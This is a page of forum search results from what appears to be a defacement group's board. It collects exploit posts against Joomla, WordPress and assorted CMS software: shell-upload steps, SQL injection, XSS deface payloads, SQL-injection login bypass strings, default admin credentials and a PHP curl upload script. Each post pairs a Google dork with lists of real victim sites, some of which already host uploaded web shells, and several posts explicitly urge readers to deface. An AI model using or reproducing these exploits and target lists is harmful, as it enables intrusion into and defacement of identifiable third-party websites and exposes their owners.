
Forum search: showing results for the tags 'exploit hack site'.




30 results found

  1. # Exploit Title: joomla com_garyscookbook file upload # Dork Google: "inurl:com_garyscookbook" poc: localhost/path/index.php?option=com_garyscookbook&func=newItem ########################### upload shell php and go 2 : localhost/path/components/com_garyscookbook/img_pictures/shell.php ############################ 1) http://www.kouzinapapanagiotou.gr/index.php?option=com_garyscookbook&func=newItem http://www.kouzinapapanagiotou.gr//components/com_garyscookbook/img_pictures/dz-hp-0.php 2) http://oneiron.gr/index.php?option=com_garyscookbook&func=newItem http://oneiron.gr/components/com_garyscookbook/img_pictures/dzdz-hp-0.php 3 ) https://www.vitamix.co.uk/index.php?option=com_garyscookbook&func=newItem https://www.vitamix.co.uk//components/com_garyscookbook/img_pictures/help.php
  2. * Title : SadafBlog Script Cross Site Scripting ( Xss Stored ) * Date : 6/19/2017 * Dork : inurl:list.php intitle:فهرست وبلاگ ها * Author : GIST * YouTube : https://youtu.be/a1hN9KC3wUQ * Version : All Version * Script Download : https://goo.gl/d7yDrt * Vendor HomePage : - * Tested On : Windows 10 About Script : Sadaf Blog SCript for blogs is beautiful and diverse capabilities including the ability to recruit blogs, etc. Some Of Facilities Of Sadaf Blog Script : 1-Allowing verification of reader comments to display 2-Assign a URL 3-The possibility of exclusive design templates or change in form, color and design blog 4-Ability to insert labels for each entry 5-Allocates 300 MB for upload in the blog admin panel And ... Exploit : 1- Open Target 2- Register A New Weblog ( Usually You Can Find It 'register' or 'register.php' ) 3- Complet Fields. 4- In Field Of Title Weblog Have To Use Inspect Element To Removing restrictions Of Character Delete This Part ' maxlength="60" ' 5- Input Your Deface Page in Title WEblog Filed 6-Click Save And Go To List Of Weblogs ( Usually You Can Find It 'list' or 'list.php' ) 7- You Will See Your Deface Page :) Demo : http://raziblog.ir/ http://shikblog.ir/ http://7blog.ir/ https://cxsecurity.com/issue/WLB-2017060128
  3. ###################### # ____ _ ____ ____ ___ ____ _ ____ _ # __ _| __ ) / | _ / ___|_ _| _ | | |___ / | # / / _ / _ | | | | | _ | || |_) | | __) | | # > <| |_) / ___ | |_| | |_| || || _ <| |___ / __/| | # /_/_____/_/ _____/ ____|___|_| ______|_____|_| # ###################### # Exploit Title : Joomla com_breezingforms Arbitrary File Upload # Exploit Author : xBADGIRL21 # Dork : inurl:index.php?option=com_breezingforms # Software link : https://crosstec.org/en/downloads/breezingforms-for-joomla.html'>https://crosstec.org/en/downloads/breezingforms-for-joomla.html # Vendor Homepage : https://crosstec.org/en/ # version : 1.8.x # Tested on: [ BACK BOX ] # skype:xbadgirl21 # Date: 01/08/2016 # video Proof : ###################### # [+] FILE UPLOAD : ###################### ###################### # [+] DESCRIPTION : ###################### # [+] BreezingForms is the only state of the art form builder for Joomla!® that combines # [+] modern techniques with enterprise features. From great looking simple forms up to complex form applications # [+] -- almost everything is possible! 
# [+] and an Shell Upload has been Detected in this component ###################### # [+] PoC : ###################### # 1.- SELECT A WEBSITE FROM THE DORK ABOVE # 2.- http://localhost/joomla/ # 3.- check this Directory if you have Access to it : media/breezingforms/uploads/ # 4.- fill the fields # 5.- Upload your Shell like :shell.php.Txt or Image to Upload Field # 6.- Shell Directory : media/breezingforms/uploads/yourfile.txt or the extension uploaded # Ex : http://www.sps-training.com/media/breezingforms/uploads/a.txt ###################### # [+] Live Demo: ###################### # http://www.sps-training.com/index.php?option=com_breezingforms&view=form&Itemid=248 #http://www.alaeu.com/index.php?option=com_breezingforms&tmpl=component&Itemid=145&ff_contentid=24&ff_form=1&ff_applic=plg_facileforms&format=html&ff_frame=1&lang=en #http://www.westernerdays.ca/index.php?option=com_breezingforms&Itemid=137&ff_form=2&ff_applic=mod_facileforms&ff_module_id=134&format=html&tmpl=component&ff_frame=1 ###################### # [+] File Path : ###################### # http://www.localhost/media/breezingforms/uploads/yourfile.txt ###################### # Discovered by : xBADGIRL21 # Greetz : All Mauritanien Hackers - NoWhere ###################### If you did not understand the exploit's content, get the video tutorial from YouTube.
  4. The Natural Software CMS SQL Injection Vulnerability exploit was registered by the Guardiran Security Team. http://iedb.ir/exploits-5423.html ########################### # Natural Software CMS SQL Injection Vulnerability ########################### * Title : Natural Software CMS SQL Injection * Date : 7/5/2016 * Exploit Author : MR.IMAN * Google Dork: intext:"Natural Software" & inurl:pages.php?ID= * Vendor Homepage: http://www.usps.org/newpublic2/join.html * Version : All Version * Category: webapps * Tested On : windows 10,kali linux Hello Guys. This Is a bypass Sql Injection Vulnerability and you can Inject this site without bypass Bypass union select : -Before Number ID & /*!50000union*/+select PoC: vulnerable : wrappers/pages.php?ID= Vulnerability : Sql Injection Response : Error reading pages select * from pages where page_id = ---------------------------------- Demo : http://www.flpowersquadron.org/wrappers/pages.php?ID=25%27 http://www.oshkoshsquadron.org/wrappers/pages.php?ID=14%27 http://www.uspsdistrict4.org/wrappers/pages.php?ID=14%27 http://www.capefearsailandpowersquadron.org/wrappers/pages.php?ID=4' http://www.santaclarapowersquadron.org/wrappers/pages.php?ID=38%27 * Special Tnx : cod3!nj3ct!0n , REX , MR.IMAN , alizombie , dastmale-sorkh , 1TED , Mr.Root * Discovered By : MR.IMAN * We Are Guardiran Security Team ########################### # Iranian Exploit DataBase = http://IeDb.Ir [2016-07-21] ###########################
  5. Hello dear friends. The vulnerability in the BBcode editor of the IP.board forum software, which was discovered and reported a few days ago by the Guardiran Security Team; unfortunately they were registering the vulnerability under their own name. So we decided to register the vulnerability, but we know that it will be abused. So act quickly to fix this vulnerability. Tutorial links: YouTube, Aparat http://www.aparat.com/v/KbtVs http://iedb.ir/exploits-5406.html ########################### # IPB BBcode Editor Cross Site Scripting Vulnerability ########################### * Title: IPB BBcode Editor Cross Site Scripting * date: 7/15/2016 * Exploit Author : Guardiran Security Team * Google Dork : intext:"Community Forum Software by IP.Board " * Vendor Homepage: https://invisionpower.com/features/apps * Application : http://invision-virus.com/forum/index.php/files/file/388-ipboardv346-illuson-nulled/ * Version : All Version * Tested On : Kali Linux w3af / Windows 8.1 Hello Guys. This Is a Xss Vulnerability Our forums application is the latest incarnation of the industry-leading IP.Board community forum software, powering thousands of communities online. Redesigned for even greater integration with the IPS Community Suite, it's the most powerful way to enable discussion on your website. ------------------ Description XSS: This CMS And Have Xss Vulnerability. We Can Run Our Script In site. The First Have To Register. 
After the confirmation e-mail account settings up.Go to the Edit Signature Use of the press BBcode.Then choose one of the options The box of available codes Paige put Deface.Better code is written in Java Script Sample Deface Page JavaScript : http://s6.picofile.com/file/8259569200/new_1.txt.html [Or] You can send in a post above actions.This vulnerability by sending an e also will be displayed Use of the press BBcode.Then choose one of the options The box of available codes Paige put Deface.Better code is written in Java Script Also The vulnerability is approved zone-h.org.It is also well documented Demo: http://forum.mythicwow.com/ http://five-m.ir/forum/ http://owl-gaming.com/forum/ http://forum.t-pasokhgoo.ir/ http://surin.ir/ http://www.nosazihormozgan.ir/forums/ * Special Tnx : cod3!nj3ct!0n , REX , alizombie , DR.GrYgHoN , MR.IMAN , reza attacker , 1TED , Comrade , dastmale-sorkh * Discovered By : MR.IMAN ~~ Y!D:demon.hacker37 * We Are Guardiran Security Team ########################### # Iranian Exploit DataBase = http://IeDb.Ir [2016-07-16] ###########################
  6. The Hyper Net It Solution cms Sql Injection Vulnerability exploit was registered by the Guardiran Security Team. This exploit was discovered by J.ALL_EdIT0r, then completed and registered. Thanks to our dear friend. http://iedb.ir/exploits-5368.html ########################### # Hyper Net It Solution cms Sql Injection Vulnerability ########################### # Exploit Title: Hyper Net It Solution cms Sql Injection # Google Dork: intext:"Developed by Hyper Net It Solution" & inurl:id= # Date: 6/28/2016 # Exploit Author: Guardiran Security Team # Vendor Homepage: http://hypernetsolutions.com/ # Version: All Version # Tested on: windows 10,kali linux # Category: webapps Hello Guys. This Is a Sql Injection Vulnerability You Can Inject The Sites Without Bypass ---------------------------------- SQL INJECTION : This CMS And Also Have SQLI Vulnerability. We Can Find The Vulnerability With Putting The " or ' After Number ID Demo : http://svnmvedu.in/page.php?id=35 http://smdmahavidyalaya.org/page.php?id=43 http://mgpiti.com/page.php?id=32%27 http://www.samarpancollege.in/page.php?id=26 http://madhavpublicschool.org/news.php?id=41%27 Response: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''43''' at line 1 * Special Tnx : cod3!nj3ct!0n , REX , MR.IMAN , alizombie , dastmale-sorkh , 1TED , Reza Attcker * Discovered By : J.ALL_EdIT0r * We Are Guardiran Security Team ########################### # Iranian Exploit DataBase = http://IeDb.Ir [2016-07-03] ###########################
  7. The jayashri combine cms Sql Injection vulnerability exploit was registered by the Guardiran Security Team. This exploit was discovered by J.ALL_EdIT0r, then completed and registered. Thanks to our dear friend. http://iedb.ir/exploits-5369.html ########################### # jayashri combine cms Sql Injection vulnerability ########################### * Title : jayashri combine cms Sql Injection vulnerability * Exploit Author : Guardiran Security Team * Google Dork: intext:"Solution By : Jaya Shri Combine" inurl:"id=" * Date: 6/25/2016 * Vendor Homepage: http://www.jayashricombine.com/ * Version : All Version * Tested On : windows 10,kali linux Hello Guys. This Is a Sql Injection Vulnerability You Can Inject The Sites Without Bypass ---------------------------------- SQL INJECTION : This CMS And Also Have SQLI Vulnerability. We Can Find The Vulnerability With Putting The " or ' After Number ID Demo : http://www.warunamanamperi.com/awardsinfo.php?id=4%27 http://www.imexlanka.com/usedvehicleinfo.php?id=106%27#.V24pVfkrLcc http://www.lankaprimelands.com/moreinfo.php?id=124%27 http://kumuduni-ayurveda.com/pages.php?id=8%27 http://nooraniyyah.org/staffinfo.php?id=16%27#.V24pYfkrLcc http://www.matarabusiness.com/business_info.php?id=1661%27 http://www.dbl.lk/eventinfo.php?id=17%27 http://www.dbautomation.lk/productinfo.php?id=25%27 * Special Tnx : cod3!nj3ct!0n , REX , MR.IMAN , alizombie , dastmale-sorkh , 1TED , Mr.Root * Discovered By : J.ALL_EdIT0r * We Are Guardiran Security Team ########################### # Iranian Exploit DataBase = http://IeDb.Ir [2016-07-03] ###########################
  8. Hello friends. I have prepared a 0day exploit for you for the Mod_jvTwitter plugin in Joomla, which is not available on any security forum; there is only a video on YouTube by its author. I hope you enjoy it. Note that to use this exploit you must install Python 2.7. Usage: place the exploit on the Desktop with the name exploit.py. Note that the exploit's extension must be .py. Then enter the following commands in cmd. cd Desktop exploit.py website/modules/mod_jvtwitter/jvtwitter.php Good luck. joomla_mod_jvtwitter_0day_exploiter.txt
  9. # Exploit Title: Joomla Component com_smartformer shell upload Vulnerability # Dork Google : inurl:"index.php?option=com_smartformer" Exploit : Go To # http://localhost/index.php?option=com_smartformer&Itemid=34 # upload shell.php # Your shell : http://localhost/components/com_smartformer/files/x.php ############################ # Demo : # 1) http://www.bmjournal.in/components/com_smartformer/files/x.php # 2) http://www.advancelitho.co.ke/components/com_smartformer/files/x.php # 3) http://www.securesystems.com.au/components/com_smartformer/files/x.php # Shell password => dz0
  10. # Exploit Title: joomla com property unrestricted file upload image php # Dork Google : inurl:/com_osproperty #1.Go to this route http://site.com/component/osproperty/?task=agent_register ############################# #2.Complete the form, raising the shell.php instead of your photo ############################# #3.Locate your file in the root /osproperty/agent/ http://site.com/images/osproperty/agent/randomid_yourshell.php ############################# #Help:This path can help you find your web shell in case you need it component/osproperty/?task=agent_default
  11. ###################### # Exploit Title : Telepecas Script Admin Page Default Password Vulnerability # Vendor Homepage : https://www.telepecas.com/index.php # Date: 2016/04/07 ###################### # PoC: # user = admin # Password = admin # Demo: # http://www.rcr.pt/admin/ # http://www.sucatao.pt/admin/ # http://www.site.reciparts.pt/admin/ # http://www.rodauto.pt/admin/ # http://renovepecas.com/admin/
  12. ###################### # Exploit Title : Canoas Web Host Admin Page Bypass # Vendor Homepage : http://canoasweb.com.br/comae/ # Google Dork : intext:" Desenvolvido por Canoas Web Host" # Date: 11 Apr 2016 # Tested On : Kali / iceweasel ###################### # # Search dork and select Target , put /admin/login.php after url such as : # http://site.com/admin/login.php # Now enter fill Login(username) and Senha(Password) like the information below : # Login : '=' 'OR' # Senha : '=' 'OR' # # e.g: # http://www.kraemer-rs.com.br/admin/login.php # http://www.polysul.com.br/admin/login.php # http://relusilsul.com.br/admin/login.php # http://www.donatomoveisedecoracoes.com.br/admin/login.php # http://www.lcdmonitores.com.br/admin/login.php # http://wmgp.com.br/admin/login.php # http://www.construtoraepoca.com.br/admin/login.php # http://canoasweb.com.br/comae/admin/login.php # http://supremaexpress.com/admin/login.php # http://www.marcenariadonato.com.br/site/admin/login.php
  13. ###################### # Exploit Title : Art23 Israel Cms Admin Bypass # Vendor Homepage : http://www.art23.co.il/ # Google Dork: intext:"Art23" , intitle:"Art23" & inurl:"admin" # Date: 11 Apr 2016 # Tested On : Kali / iceweasel ###################### # # Search dork and select Target , put /admin/login.php after url such as : # http://site.com/admin/login.php # Now enter fill Login(username) and Senha(Password) like the information below : # Login : '=' 'OR' # Senha : '=' 'OR' # # e.g: # http://roni-ort.co.il/admin/login.php # http://vilamaya.co.il/admin/login.php # http://sinai-carpets.com/admin/login.php # http://simonab.co.il/admin/login.php # http://topnail.co.il/admin/login.php # http://smartkid.co.il/admin/login.php # http://hy-spa.co.il/admin/login.php # http://mihart.co.il/admin/login.php # http://yptolo.co.il/admin/login.php # http://www.tipul-beomanut.co.il/admin/login.php # http://grands.co.il/admin/login.php # http://www.amos-hatzadik.co.il/admin/login.php
  14. ###################### # Exploit Title : Epark IT Schools Management Admin Page Bypass # Vendor Homepage : http://www.epark-it.com # Google Dork : intext:"Developed by Epark IT" site:.edu.bd # Date: 12 Apr 2016 # Tested On : Kali / iceweasel ###################### # # Search dork and select Target , put /settings after url such as : # http://site.com/settings # Now enter fill Username and Password like the information below : # Username : '=' 'OR' # Password : '=' 'OR' # # e.g: # http://ruddreshwarsc.edu.bd/settings/ # http://dmsararpar.edu.bd/settings/ # http://www.dharmopurajc.edu.bd/settings/ # http://nutandulal.edu.bd/settings/ # http://uttarbahs.edu.bd/settings/ # http://baburali.edu.bd/settings/ # http://chalbaladalefm.edu.bd/settings/ # http://geniusacademyjhs.edu.bd/settings/ # http://panchgachism.edu.bd/settings/ # http://dalgramhs.edu.bd/settings/ # http://sacollegebogra.edu.bd/settings/ # http://nssdakhilmadrasah.edu.bd/settings/
  15. |[+] Exploit Title: Wordpress Product Options for WooCommerce Plugin File Upload |[+] |[+] Software Link: http://codecanyon.net/item/product-options-for-woocommerce-wp-plugin/7973927 |[+] |[+] Google Dork: inurl:/woocommerce-product-options/includes/ |[+] |[+] Date: 11.04.2016 |[+] |--------------------------------------------------------------| |[+] Exploit: VICTIM/wp-content/plugins/woocommerce-product-options/includes/image-upload.php |[+] |[+] Description: Change your shell's extension "shell.php" to "shell.php;.jpg" and upload your shell |[+] |[+] Your files uploaded to VICTIM/wp-content/uploads/filename |[+] |[+] OR |[+] |[+] VICTIM/wp-content/[year]/[month]/filename |[+] |[+] Examples: |[+] |[+] http://www.detasselingppe.com/wp-content/plugins/woocommerce-product-options/includes/image-upload.php |[+] |[+] http://medindex.am/wp-content/plugins/woocommerce-product-options/includes/image-upload.php |[+] |[+] http://www.bo3generacion.es/wp-content/plugins/woocommerce-product-options/includes/image-upload.php
  16. Hello. Dear users, this exploit was made public today. Dear defacers, make use of it. # Exploit Title: Joomla Image Upload - Arbitrary File Upload # Google Dork: inurl:option= # Vendor Homepage: http://tuts4you.de/ # Software Link: http://tuts4you.de/96-development/156-simpleimageupload # Version: 1.0 # Tested on:Win32 # Vuln Same to Com_Media Vulnerability ########################## POST /index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=desc ########################### tamper data Host:127.0.0.1 User-Agent=Mozilla/5.0 (Windows NT 6.1; rv:46.0) Gecko/20100101 Firefox/46.0 Accept=text/html/php,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language=en-US,en;q=0.5 Accept-Encoding=gzip, deflate Cookie=92e1ffe3bb23e8a366ff65194917235e=15168f4d2be2ab52b9730a55b4674ae5 Connection=keep-alive Content-Type=multipart/form-data; boundary=---------------------------281102171512373 Content-Length=49328 POSTDATA =-----------------------------281102171512373 Content-Disposition: form-data; name="Filedata"; filename="Neme fail.php" Content-Type: image/jpeg -----------------------------281102171512373 Content-Disposition: form-data; name="return-url" aW5kZXgucGhwP29wdGlvbj1jb21fc2ltcGxlaW1hZ2V1cGxvYWQmdmlldz11cGxvYWQmdG1wbD1jb21wb25lbnQmZV9uYW1lPWpmb3JtX2FydGljbGV0ZXh0 -----------------------------281102171512373-- your Fail neme shell. http://www.bonyadtabari.ir//images/pic/neme fail.php ######################################### # Exploit : <?php echo '<form action="#" method="post" enctype="multipart/form-data"> <input type="text" name="target" value="www.localhost.com" /><input type="submit" name="Pwn" value="Pwn!" /> </form>'; if($_POST) { $target = $_POST['target']; $file = "0wn3d ! 
;)"; $header = array("Content-Type: application/x-php", "Content-Disposition: form-data; name="Filedata"; file="L0v3.php.""); $ch = curl_init("http://".$target."/index.php?option=com_simpleimageupload&task=upload.upload&tmpl=component"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 Safari/537.36"); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$file", "return-url" => "aW5kZXgucGhwP29wdGlvbj1jb21fc2ltcGxlaW1hZ2V1cGxvYWQmdmlldz11cGxvYWQmdG1wbD1jb21wb25lbnQmZV9uYW1lPWRlc2M=",)); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HTTPHEADER, $header); $result = curl_exec($ch); curl_close($ch); print "$result"; } else { die(); } ?> ######################################### Demo: http://dartmoorscenictours.co.uk/index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=jform_text http://www.khamphoempittaya.ac.th/en/?option=com_simpleimageupload&view=upload&tmpl=component&e_name=jform_content http://www.smarterhomesolutions.net/index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=jform_text http://www.agescirimini.it/index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=comment
  17. Hello. This exploit was made public today; defacer friends, make use of it. If you can, upload a shell as well. |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |--------------------------------------------------------------| |[+] Exploit Title: Admin Page Bypass [ 3Pixels® Media ] By 1337r00t |[+] |[+] Vendor Homepage: http://www.3pixelsltd.com/ |[+] |[+] Google Dork: intext:Site Credits: 3Pixels® Media |[+] |[+] Tested on: Windows 10 , Mozilla Firefox |[+] |[+] Date: 9/4/2016 |[+] |--------------------------------------------------------------| |[+] Exploit : |[+] |[+] Note: Download Tool [NoRedirect] On addons Mozilla Firefox |[+] |[+] |[+] Admin Url :- |[+] http://[$Site]/backend/ |[+] |[+] |[+] |[+] 1- Run Tool NoRedirect |[+] 2- Add Site New |[+] 3- Add: ^[$site]/backend/ |[+] 4- Open Link : http://[$site]/backend/dashboard.php |[+] |--------------------------------------------------------------| |[+] Demo:- |[+] |[+] http://www.sixthsensedecor.com/backend/ |[+] http://whistleschildrensplace.com/backend/
  18. Hello. Friends, this exploit was made public today; make use of it. ###################### # Exploit Title : Telepeças Script Admin Page Default Password Vulnerability # Vendor Homepage : https://www.telepecas.com/index.php # Date: 2016/04/11 ###################### # PoC: # user = admin # Password = admin # Demo: # http://www.rcr.pt/admin/ # http://www.sucatao.pt/admin/ # http://www.site.reciparts.pt/admin/ # http://www.rodauto.pt/admin/ # http://renovepecas.com/admin/
  19. Greetings. First, the Google dork: intext:"Powered by MAXSITE 1.10" Admin panel: /index.php?name=admin Type in: ' OR '1'='1' -- For both username and password and then login. (Don't forget to add space after --) Demo: http://www.asianlife.byethost4.com/index.php?name=admin http://pyc.payap.ac.th/chi2009/index.php?name=admin http://www.lannapoly.ac.th/web2550/quality/web/index.php?name=admin
  20. Hello friends. Dear HitlrHacker discovered this vulnerability, and I wrote the exploit for it and registered it. Good luck. https://cxsecurity.com/issue/WLB-2016020054 ######################################################## # Exploit Title: acemedia SQL Injection ######################################################## # Date: [2016/2/4] # Google Dork: intext:طراحی توسط acemedia inurl:?id= # Exploit Author: Guardiran Security Team =>hitlrhacker # Vendor Homepage: [http://www.acemedia.ir/] # Software Link: [-] # Version: All Version # Tested on: [windows 8.1 & Google Chrome] ######################################################## # DESCRIPTION: Hello Guys.This vulnerability is SQL type # We put ["] we can get the MySQL error # For Example: # [http://www.irtu.ir/index.php?id=19%22] # GooD LucK ######################################################## # Demo: # http://www.irtu.ir/index.php?id=19%22 # http://iasbs.ac.ir/math/dep=4%22 # http://www.naria.info/view/14.aspx?id=346%22 # http://www.ir-translate.com/PU/link/ftc_page.aspx?id=1003107%22 ######################################################## # Thanks to : C0d3!Nj3ct!0N | REX | abarestan | GrYpHoN | alizombie | DeMoN | ColEctOR # We Are Guardiran Security Team # Discovered By:hitlrhacker ########################################################
  21. Hello again. Well, here is the second Joomla bug, which is also rated HIGH, for you dear members of the team. The Joomla Remot File Upload Vulnerability exploit was registered under the name of the Guardiran Security Team. https://cxsecurity.com/issue/WLB-2015110194 http://iedb.ir/exploits-4198.html ######################################################## # Exploit Title: Joomla Remot File Upload Vulnerability ######################################################## # Google Dork1: inurl:index.php?option=com_media & site:com # Google Dork2: inurl:index.php?option=com_media & site:org # Google Dork3: inurl:index.php?option=com_media & site:net # Date: [22/11/2015] # Exploit Author: Guardiran Security Team =>DeMoN # Vendor Homepage: [https://developer.joomla.org/joomlacode-archive/issue-29776.html] # Software Link: [-] # Version: All Version # Tested on: [Win 8.1/Google chrome] # CVE : [-] ######################################################## # DESCRIPTION: Hello Guys.This Is A Plugin Of Joomla For Upload Files. # Exploit: # Add This Link After Address Target # /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder # For Example: Site.com/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder ######################################################## # Demo: # http://drugfreeclubXsofamerica.com/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder # http://www.saba4X215.com/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder # http://www.johnwargoX.com/index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=com_content&author= # http://www.diffhospitXal.com/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder # 
http://www.smartcaXrleasing.com/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder # http://fvteamsportXs.com/joomla/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder ######################################################## # Thanks to : C0d3!Nj3ct!0N | REX | abarestan | GrYpHoN | BLACKH4T # We Are Guardiran Security Team # Discovered By:DeMoN ######################################################## My Friends The First GoD C0d3!nj3ct!0n REX abarestan GrYpHoN MR.R3DHAT
  22. Hello to the dear friends of Guardiran. Well, I was less active for a day or two; I am back with two HIGH-rated bugs registered for the team and for you dear members, so you can deface plenty of sites. The Joomla Autostand File Upload Vulnerability exploit was registered under the name of the Guardiran Security Team. https://cxsecurity.com/issue/WLB-2015110195 http://iedb.ir/exploits-4199.html ######################################################## # Exploit Title: Joomla Autostand File Upload Vulnerability ######################################################## # Google Dork: inurl:/images/autostand/ # Date: [22/11/2015] # Exploit Author: Guardiran Security Team =>DeMoN # Vendor Homepage: [http://100cms.org/extension/joomla/4801-Autostand] # Software Link: [-] # Version: All Version # Tested on: [Win 8.1/Google chrome] # CVE : [-] ######################################################## # DESCRIPTION: Hello Guys. # This Is Like As RFU Bug. # You Can Upload Your Image In Your Target. # Also You Can Bypass Your Shell To .jpg Then Upload It In Target. ######################################################## # Exploit: # Add This Link To Target After This The Words: # /pt/ | /asp/ And The Other Words # {/index.php?option=com_autostand&func=newItem} ######################################################## # Demo: # http://smartXonecity.com/pt/index.php?option=com_autostand&func=newItem # http://smaXrtonecity.com/pt/index.php?option=com_autostand&func=newItem #http://www.antaresXmotors.cl/asp/index.php?option=com_autostand&func=newItem # http://autoschapaXs.com/index.php?option=com_autostand&func=newItem # http://lepetitvo.cXom/index.php?option=com_autostand&func=newItem # http://www.geeX-wagen.co.uk/index.php?option=com_autostand&func=newItem # http://www.auXtorimessafranco.com/index.php?option=com_autostand&func=newItem # http://www.fXirstcar45.fr/annonces-automobile/newitem ######################################################## # Thanks to : C0d3!Nj3ct!0N | REX | abarestan | GrYpHoN | BLACKH4T # We Are Guardiran Security Team # Discovered By:DeMoN 
######################################################## My Friends The First GoD C0d3!nj3ct!0n REX abarestan GrYpHoN MR.R3DHAT
  23. The exploit (e107 v2 Bootstrap CMS XSS Vulnerability) was registered under the name of the Guardiran Security Team. Hoping for the ever-growing progress of the great Guardiran team. https://cxsecurity.com/issue/WLB-2015110174 ######################################################## # Exploit Title: e107 v2 Bootstrap CMS XSS Vulnerability ######################################################## # Google Dork: Proudly powered by e107 # Date: [19/11/2015] # Exploit Author: Guardiran Security Team =>DeMoN # Vendor Homepage: [http://e107.org/] # Software Link: [-] # Version: All Version # Tested on: [Win 8.1/Google chrome] # CVE : [-] ######################################################## # DESCRIPTION: Hello Guys. # CMS user details section is vulnerable to XSS. You can run XSS payloads. # XSS Vulnerability #1: # Go Update user settings page # "http://{target-url}/usersettings.php" # Set Real Name value; # "><script>alert(String.fromCharCode(88, 83, 83))</script> # or # "><script>alert(document.cookie)</script> ######################################################## # Thanks to : C0d3!Nj3ct!0N | REX | abarestan | GrYpHoN | BLACKH4T # We Are Guardiran Security Team # Discovered By:DeMoN ######################################################## My Friends The First GoD C0d3!nj3ct!0n REX abarestan GrYpHoN MR.R3DHAT
  24. The exploit bisnis7/Cross Site Scripting(XSS) was registered under the name of the Guardiran Security Team. https://cxsecurity.com/issue/WLB-2015110116 http://iedb.ir/exploits-4130.html ######################################################## # Exploit Title: bisnis7/Cross Site Scripting(XSS) ######################################################## # Google Dork: inurl:"poto" intext:"powered by Bisnis7 " # You Can Make Another Dork For This Bug # Date: [15/11/2015] # Exploit Author: Guardiran Security Team =>DeMoN # Vendor Homepage: [http://bisnis7.com.webstatsdomain.org/] # Software Link: [-] # Version: All Version # Tested on: [Win 8.1/Google chrome] # CVE : [-] ######################################################## # DESCRIPTION: Hello Guys. # That sites Have XSS Or Cross Site Scripting Bug. # Please Enter Dork In Google And Open Your Target. # Then add This Script # ["><marquee><h1>Hacked_By_DeMoN_guardiran.org</h1></marquee>] # In Target after This Section # [index.php?imgdir=] # Then You See That Your Script Accomplished. # GooD LucK ######################################################## # Demo: # http://www.rumahguidXes.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://www.geestringXs.net/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://dumbwaiterinXdonesia.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E ######################################################## # Thanks to : C0d3!Nj3ct!0N | REX | abarestan | GrYpHoN | BLACKH4T # We Are Guardiran Security Team # Discovered By:DeMoN ######################################################## My Friends The First GoD C0d3!nj3ct!0n REX abarestan GrYpHoN MR.R3DHAT
  25. Exploit registered (StudioWeb/Cross Site Scripting (XSS)) in the name of the Guardiran Security Team. https://cxsecurity.com/issue/WLB-2015110115 http://iedb.ir/exploits-4129.html

      ########################################################
      # Exploit Title: StudioWeb/Cross Site Scripting(XSS)
      ########################################################
      # Google Dork: inurl:"poto" intext:"powered by StudioWeb "
      # You Can Make Another Dork For This Bug
      # Date: [15/11/2015]
      # Exploit Author: Guardiran Security Team =>DeMoN
      # Vendor Homepage: [http://www.studioweb.com/]
      # Software Link: [-]
      # Version: All Version
      # Tested on: [Win 8.1/Google chrome]
      # CVE : [-]
      ########################################################
      # DESCRIPTION: Hello Guys.
      # Those Sites Have XSS Or Cross Site Scripting Bug.
      # Please Enter Dork In Google And Open Your Target.
      # Then add This Script
      # ["><marquee><h1>Hacked_By_DeMoN_guardiran.org</h1></marquee>]
      # In Target after This Section
      # [index.php?imgdir=]
      # Then You See That Your Script Accomplished.
      # GooD LucK
      ########################################################
      # Demo:
      # http://assalamherbal222X.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E
      # http://susu-bubuk.comX/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E
      # http://bestbeachbungXalows.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E
      # http://www.ptskk.coXm/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E
      # http://www.goholidayX-tour.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E
      # http://www.kristalboXhemia.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E
      # http://www.kristalbXohemia.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E
      ########################################################
